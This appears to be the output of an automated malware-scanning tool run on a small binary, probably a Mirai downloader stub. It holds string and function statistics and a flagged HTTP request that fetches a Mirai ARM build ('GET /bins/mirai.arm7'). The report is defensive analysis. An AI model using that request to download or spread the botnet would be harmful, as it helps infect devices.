=============================================================================
========	BINARY ID :02fae19667796e24c462c76aa3a368ec60eaa208==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :14
SUPSCPECTED LINES COUNT :1
SUPSCPECTED STRINGS COUNT (DISTINCT) :2
SUPSCPECTED STRINGS WEIGHT :7
SUSPECT STRING SCORE : [7 / 150] 4%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :0
DYNAMIC IPs STRINGS COUNT :0
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
GET /bins/mirai.arm7 HTTP/1.0\r\n\r\n
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 460
+++TOTAL FUNCTIONS 			:12
+++LINES PER FUNCTION RATIO 	: 38.3333333333333
+++SUSPECTED LINES COUNT 	: 3
+++SUSPECTED LINES RATIO 	: 0.652173913043478
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 460
+++WHILE (TRUE) LINES			: 0
+++WHILE (TRUE) LINES RATION		:0%
+++WHILE (TRUE) LOOPS COUNT		: 
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
        "GET /bins/mirai.arm7 HTTP/1.0\r\n\r\n"
        "GET /bins/mirai.arm7 HTTP/1.0\r\n\r\n"
    char (*v14)[34] = "GET /bins/mirai.arm7 HTTP/1.0\r\n\r\n";
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_80c0                                     |6   |30      |3             |0           |
----------------------------------------------------------------------------------------------
function_8104                                     |1   |20      |0             |0           |
----------------------------------------------------------------------------------------------
function_8124                                     |3   |20      |0             |0           |
----------------------------------------------------------------------------------------------
function_80e4                                     |1   |20      |0             |0           |
----------------------------------------------------------------------------------------------
function_81ac                                     |3   |20      |0             |0           |
----------------------------------------------------------------------------------------------
function_81d8                                     |3   |20      |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |0   |20      |0             |0           |
----------------------------------------------------------------------------------------------
function_83b0                                     |2   |26      |0             |0           |
----------------------------------------------------------------------------------------------
function_8208                                     |0   |157     |0             |0           |
----------------------------------------------------------------------------------------------
function_8150                                     |3   |20      |0             |0           |
----------------------------------------------------------------------------------------------
function_8410                                     |0   |21      |0             |0           |
----------------------------------------------------------------------------------------------
function_8180                                     |3   |20      |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_80c0 ===================
++++++++ FUNCTION START 27
++++++++ FUNCTION END 57
++++++++ FUNCTION LENGTH 30
        "GET /bins/mirai.arm7 HTTP/1.0\r\n\r\n"
        "GET /bins/mirai.arm7 HTTP/1.0\r\n\r\n"
    char (*v14)[34] = "GET /bins/mirai.arm7 HTTP/1.0\r\n\r\n";
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
